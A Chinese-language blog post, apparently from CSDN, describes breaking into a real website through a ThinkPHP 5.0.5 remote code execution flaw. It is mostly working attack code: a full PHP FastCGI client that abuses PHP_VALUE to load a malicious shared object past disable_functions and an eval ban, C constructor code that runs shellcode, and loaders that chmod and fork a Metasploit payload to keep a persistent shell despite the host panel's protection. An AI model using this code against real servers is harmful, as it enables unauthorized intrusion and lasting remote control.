tp rce漏洞
该网站debug显示该站点的tp版本为5.0.5,宝塔搭建
直接上rce payload
执行成功
问题点:
1.此站点disable_functions函数基本都禁用了,另外加载了禁用eval的扩展
2.web目录不允许出现.php后缀文件,写入后会立即删除
绕过限制getshell
由于站点禁用了eval,导致webshell管理工具不能使用,那就直接上线msf,但是disable_functions和eval禁用了命令执行和几个绕过disable_functions的函数,经过尝试,发现只有FastCGI-FPM的方式可以绕过限制,并且加载恶意so
FastCGI-FPM绕过请参考:从一道CTF学习Fastcgi绕过姿势-安全客 - 安全资讯平台
构造FastCGI-FPM php脚本:
<?php
echo "<br>include success<br/>";
class TimedOutException extends \Exception
{
}
class ForbiddenException extends \Exception
{
}
class Client
{
const VERSION_1 = 1;
const BEGIN_REQUEST = 1;
const ABORT_REQUEST = 2;
const END_REQUEST = 3;
const PARAMS = 4;
const STDIN = 5;
const STDOUT = 6;
const STDERR = 7;
const DATA = 8;
const GET_VALUES = 9;
const GET_VALUES_RESULT = 10;
const UNKNOWN_TYPE = 11;
const MAXTYPE = self::UNKNOWN_TYPE;
const RESPONDER = 1;
const AUTHORIZER = 2;
const FILTER = 3;
const REQUEST_COMPLETE = 0;
const CANT_MPX_CONN = 1;
const OVERLOADED = 2;
const UNKNOWN_ROLE = 3;
const MAX_CONNS = 'MAX_CONNS';
const MAX_REQS = 'MAX_REQS';
const MPXS_CONNS = 'MPXS_CONNS';
const HEADER_LEN = 8;
const REQ_STATE_WRITTEN = 1;
const REQ_STATE_OK = 2;
const REQ_STATE_ERR = 3;
const REQ_STATE_TIMED_OUT = 4;
private $_sock = null;
private $_host = null;
private $_port = null;
private $_keepAlive = false;
private $_requests = array();
private $_persistentSocket = false;
private $_connectTimeout = 5000;
private $_readWriteTimeout = 5000;
public function __construct($host, $port)
{
$this->_host = $host;
$this->_port = $port;
}
public function setKeepAlive($b)
{
$this->_keepAlive = (boolean) $b;
if (!$this->_keepAlive && $this->_sock) {
fclose($this->_sock);
}
}
public function getKeepAlive()
{
return $this->_keepAlive;
}
public function setPersistentSocket($b)
{
$was_persistent = ($this->_sock && $this->_persistentSocket);
$this->_persistentSocket = (boolean) $b;
if (!$this->_persistentSocket && $was_persistent) {
fclose($this->_sock);
}
}
public function getPersistentSocket()
{
return $this->_persistentSocket;
}
public function setConnectTimeout($timeoutMs)
{
$this->_connectTimeout = $timeoutMs;
}
public function getConnectTimeout()
{
return $this->_connectTimeout;
}
public function setReadWriteTimeout($timeoutMs)
{
$this->_readWriteTimeout = $timeoutMs;
$this->set_ms_timeout($this->_readWriteTimeout);
}
public function getReadWriteTimeout()
{
return $this->_readWriteTimeout;
}
private function set_ms_timeout($timeoutMs)
{
if (!$this->_sock) {
return false;
}
return stream_set_timeout($this->_sock, floor($timeoutMs / 1000), ($timeoutMs % 1000) * 1000);
}
private function connect()
{
if (!$this->_sock) {
if ($this->_persistentSocket) {
$this->_sock = pfsockopen($this->_host, $this->_port, $errno, $errstr, $this->_connectTimeout / 1000);
} else {
$this->_sock = fsockopen($this->_host, $this->_port, $errno, $errstr, $this->_connectTimeout / 1000);
}
if (!$this->_sock) {
throw new \Exception('Unable to connect to FastCGI application: ' . $errstr);
}
if (!$this->set_ms_timeout($this->_readWriteTimeout)) {
throw new \Exception('Unable to set timeout on socket');
}
}
}
private function buildPacket($type, $content, $requestId = 1)
{
$clen = strlen($content);
return chr(self::VERSION_1) /* version */
. chr($type) /* type */
. chr(($requestId >> 8) & 0xFF) /* requestIdB1 */
. chr($requestId & 0xFF) /* requestIdB0 */
. chr(($clen >> 8) & 0xFF) /* contentLengthB1 */
. chr($clen & 0xFF) /* contentLengthB0 */
. chr(0) /* paddingLength */
. chr(0) /* reserved */
. $content; /* content */
}
private function buildNvpair($name, $value)
{
$nlen = strlen($name);
$vlen = strlen($value);
if ($nlen < 128) {
/* nameLengthB0 */
$nvpair = chr($nlen);
} else {
/* nameLengthB3 & nameLengthB2 & nameLengthB1 & nameLengthB0 */
$nvpair = chr(($nlen >> 24) | 0x80) . chr(($nlen >> 16) & 0xFF) . chr(($nlen >> 8) & 0xFF) . chr($nlen & 0xFF);
}
if ($vlen < 128) {
/* valueLengthB0 */
$nvpair .= chr($vlen);
} else {
/* valueLengthB3 & valueLengthB2 & valueLengthB1 & valueLengthB0 */
$nvpair .= chr(($vlen >> 24) | 0x80) . chr(($vlen >> 16) & 0xFF) . chr(($vlen >> 8) & 0xFF) . chr($vlen & 0xFF);
}
/* nameData & valueData */
return $nvpair . $name . $value;
}
private function readNvpair($data, $length = null)
{
$array = array();
if ($length === null) {
$length = strlen($data);
}
$p = 0;
while ($p != $length) {
$nlen = ord($data { $p++});
if ($nlen >= 128) {
$nlen = ($nlen & 0x7F << 24);
$nlen |= (ord($data{ $p++}) << 16);
$nlen |= (ord($data{ $p++}) << 8);
$nlen |= (ord($data{ $p++}));
}
$vlen = ord($data { $p++});
if ($vlen >= 128) {
$vlen = ($nlen & 0x7F << 24);
$vlen |= (ord($data{ $p++}) << 16);
$vlen |= (ord($data{ $p++}) << 8);
$vlen |= (ord($data{ $p++}));
}
$array[substr($data, $p, $nlen)] = substr($data, $p + $nlen, $vlen);
$p += ($nlen + $vlen);
}
return $array;
}
private function decodePacketHeader($data)
{
$ret = array();
$ret['version'] = ord($data { 0});
$ret['type'] = ord($data { 1});
$ret['requestId'] = (ord($data{ 2}) << 8) + ord($data { 3});
$ret['contentLength'] = (ord($data{ 4}) << 8) + ord($data { 5});
$ret['paddingLength'] = ord($data { 6});
$ret['reserved'] = ord($data { 7});
return $ret;
}
private function readPacket()
{
if ($packet = fread($this->_sock, self::HEADER_LEN)) {
$resp = $this->decodePacketHeader($packet);
$resp['content'] = '';
if ($resp['contentLength']) {
$len = $resp['contentLength'];
while ($len && ($buf = fread($this->_sock, $len)) !== false) {
$len -= strlen($buf);
$resp['content'] .= $buf;
}
}
if ($resp['paddingLength']) {
$buf = fread($this->_sock, $resp['paddingLength']);
}
return $resp;
} else {
return false;
}
}
public function getValues(array $requestedInfo)
{
$this->connect();
$request = '';
foreach ($requestedInfo as $info) {
$request .= $this->buildNvpair($info, '');
}
fwrite($this->_sock, $this->buildPacket(self::GET_VALUES, $request, 0));
$resp = $this->readPacket();
if ($resp['type'] == self::GET_VALUES_RESULT) {
return $this->readNvpair($resp['content'], $resp['length']);
} else {
throw new \Exception('Unexpected response type, expecting GET_VALUES_RESULT');
}
}
public function request(array $params, $stdin)
{
$id = $this->async_request($params, $stdin);
return $this->wait_for_response($id);
}
public function async_request(array $params, $stdin)
{
$this->connect();
// Pick random number between 1 and max 16 bit unsigned int 65535
$id = mt_rand(1, (1 << 16) - 1);
// Using persistent sockets implies you want them keept alive by server!
$keepAlive = intval($this->_keepAlive || $this->_persistentSocket);
$request = $this->buildPacket(
self::BEGIN_REQUEST
, chr(0) . chr(self::RESPONDER) . chr($keepAlive) . str_repeat(chr(0), 5)
,
$id
);
$paramsRequest = '';
foreach ($params as $key => $value) {
$paramsRequest .= $this->buildNvpair($key, $value, $id);
}
if ($paramsRequest) {
$request .= $this->buildPacket(self::PARAMS, $paramsRequest, $id);
}
$request .= $this->buildPacket(self::PARAMS, '', $id);
if ($stdin) {
$request .= $this->buildPacket(self::STDIN, $stdin, $id);
}
$request .= $this->buildPacket(self::STDIN, '', $id);
if (fwrite($this->_sock, $request) === false || fflush($this->_sock) === false) {
$info = stream_get_meta_data($this->_sock);
if ($info['timed_out']) {
throw new TimedOutException('Write timed out');
}
// Broken pipe, tear down so future requests might succeed
fclose($this->_sock);
throw new \Exception('Failed to write request to socket');
}
$this->_requests[$id] = array(
'state' => self::REQ_STATE_WRITTEN,
'response' => null
);
return $id;
}
public function wait_for_response($requestId, $timeoutMs = 0)
{
if (!isset($this->_requests[$requestId])) {
throw new \Exception('Invalid request id given');
}
if (
$this->_requests[$requestId]['state'] == self::REQ_STATE_OK
|| $this->_requests[$requestId]['state'] == self::REQ_STATE_ERR
) {
return $this->_requests[$requestId]['response'];
}
if ($timeoutMs > 0) {
// Reset timeout on socket for now
$this->set_ms_timeout($timeoutMs);
} else {
$timeoutMs = $this->_readWriteTimeout;
}
$startTime = microtime(true);
do {
$resp = $this->readPacket();
if ($resp['type'] == self::STDOUT || $resp['type'] == self::STDERR) {
if ($resp['type'] == self::STDERR) {
$this->_requests[$resp['requestId']]['state'] = self::REQ_STATE_ERR;
}
$this->_requests[$resp['requestId']]['response'] .= $resp['content'];
}
if ($resp['type'] == self::END_REQUEST) {
$this->_requests[$resp['requestId']]['state'] = self::REQ_STATE_OK;
if ($resp['requestId'] == $requestId) {
break;
}
}
if (microtime(true) - $startTime >= ($timeoutMs * 1000)) {
// Reset
$this->set_ms_timeout($this->_readWriteTimeout);
throw new \Exception('Timed out');
}
} while ($resp);
if (!is_array($resp)) {
$info = stream_get_meta_data($this->_sock);
// We must reset timeout but it must be AFTER we get info
$this->set_ms_timeout($this->_readWriteTimeout);
if ($info['timed_out']) {
throw new TimedOutException('Read timed out');
}
if (
$info['unread_bytes'] == 0
&& $info['blocked']
&& $info['eof']
) {
throw new ForbiddenException('Not in white list. Check listen.allowed_clients.');
}
throw new \Exception('Read failed');
}
// Reset timeout
$this->set_ms_timeout($this->_readWriteTimeout);
switch (ord($resp['content'] { 4})) {
case self::CANT_MPX_CONN:
throw new \Exception('This app can\'t multiplex [CANT_MPX_CONN]');
break;
case self::OVERLOADED:
throw new \Exception('New request rejected; too busy [OVERLOADED]');
break;
case self::UNKNOWN_ROLE:
throw new \Exception('Role value not known [UNKNOWN_ROLE]');
break;
case self::REQUEST_COMPLETE:
return $this->_requests[$requestId]['response'];
}
}
}
//php-cgi.sock路径
$sock = "/tmp/php-cgi-56.sock";
//待加载的so文件
$so_name = "ffflg.so";
//web php路径
$filepath0 = "/www/wwwroot/xxx.com/index.php";
$client = new Client("unix://$sock", -1);
// $client = new Client('127.0.0.1', '9000');
//扩展so设置
$php_value = "extension = /tmp/$so_name\n";
$filepath = $filepath0;
$code = "test";
echo $client->request(
array(
'GATEWAY_INTERFACE' => 'FastCGI/1.0',
'REQUEST_METHOD' => 'POST',
'SCRIPT_FILENAME' => $filepath,
'SCRIPT_NAME' => $filepath,
'SERVER_SOFTWARE' => 'php/fcgiclient',
'REMOTE_ADDR' => '127.0.0.1',
'REMOTE_PORT' => '9985',
'SERVER_ADDR' => '127.0.0.1',
'SERVER_PORT' => '80',
'SERVER_NAME' => 'mag-tured',
'SERVER_PROTOCOL' => 'HTTP/1.1',
'CONTENT_TYPE' => 'application/x-www-form-urlencoded',
'CONTENT_LENGTH' => strlen($code),
'PHP_VALUE' => $php_value,
),
$code
);
echo "<br>success<br>";
?>加载shellcode的so源码:
//加载shellcode
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
//__attribute__ ((__constructor__))约定符会将函数标记为构造函数,加载时自动执行
__attribute__ ((__constructor__)) void preload (void){
unsigned char code[] = [shellcode]; //shellcode自己写,别懒
void *mem = mmap(NULL, sizeof(code), PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
memcpy(mem, code, sizeof(code));
((void(*)())mem)();
}编译为so文件> gcc loader.c -fPIC -shared -o ffflg.so
将php脚本及编译好的so文件传到服务器上,包含php脚本加载so
虽然成功上线,但是过一会就自己会掉线,经过测试发现这是php-fpm进程的问题,由于php-fpm进程加载的so文件,所以php-fpm进程结束时,会话自动掉线,php-fpm受到php脚本执行超时时间影响,导致时间一到就会退出php-fpm进程。
不过既然能上线,那么不就可以执行命令吗,可以执行命令不就能再弹一个shell嘛,嘿嘿
突遭雷击,执行命令居然有宝塔的防护,这下好像彻底没戏了,不过经过后面思考测试,发现宝塔应该是防御的用户态(壳,类似于hook bash程序),既然这样的话,那么通过C调用底层的系统调用函数(简单来说是通过软中断由用户态切换到内核态),不就可以绕过限制了吗?
绕过限制获取持久shell
生成msf的马,并上传至服务器,发现没有执行权限
那就尝试用exec函数族调用chmod程序给木马加个执行权限
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__ ((__constructor__)) void preload (void){
char *programPath = "/bin/chmod";
char *arguments[] = {programPath, "755", "/tmp/debug1", NULL};
if (execvp(programPath, arguments) == -1) {
perror("execvp");
exit(EXIT_FAILURE);
}
// 这里的代码不会执行,除非 execvp 失败
printf("This line won't be reached.\n");
}
成功了,nice,接下来执行上线
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
__attribute__ ((__constructor__)) void preload (void){
pid_t pid = fork();
if (pid == -1) {
perror("fork");
exit(EXIT_FAILURE);
}
if (pid == 0) {
// 子进程
char *programPath = "/tmp/debug1";
char *arguments[] = {programPath, NULL};
if (execvp(programPath, arguments) == -1) {
perror("execvp");
exit(EXIT_FAILURE);
}
// 这里的代码不会执行,因为 execvp 成功后子进程已经被替代
printf("This line won't be reached in the child process.\n");
} else {
// 父进程等待子进程结束
wait(NULL);
printf("Parent process is done.\n");
}
}需要注意的是,如果直接使用exec函数族调用该木马,依旧会在时间超时后掉线,因为其依赖于创建它的php-fpm进程,php-fpm进程退出,该木马进程也会退出,所以以上代码使用了开启子进程的方式加载木马,这样可以脱离php-fpm进程,达到持续运行的效果
成功上线,会话不会再出现超时断开的问题。
免费领取安全学习资料包!
渗透工具
技术文档、书籍
面试题
帮助你在面试中脱颖而出
视频
基础到进阶
环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等
应急响应笔记
学习路线
![[python库] mistune库的基本使用](https://img-blog.csdnimg.cn/direct/c0a5a7a0d9c94e67bb36e8d051fc6db2.png#pic_center)
![[java学习日记]反射、动态代理](https://img-blog.csdnimg.cn/direct/ce9f34e6562d4f1886a770eee93ade85.png)
